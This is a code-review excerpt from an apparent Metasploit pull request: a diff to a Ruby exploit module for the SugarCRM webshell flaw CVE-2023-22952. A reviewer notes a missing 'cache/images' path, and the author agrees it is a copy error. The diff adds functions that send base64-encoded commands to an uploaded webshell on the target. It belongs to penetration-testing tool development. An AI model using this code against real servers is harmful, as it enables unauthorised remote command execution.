modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -169,15 +217,32 @@ def upload_webshell
     end
   end
 
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        '1' => payload
+      }
+    })
+  end
+
   def execute_command(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
     return send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'cache', 'images', @webshell_name),
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
```

Comment:
Was this meant to be deleted? Think you still need the `cache` and `images` part unless I'm mistaken?

Reply:
yeah, good catch. That is a copy error. Will fix this right away.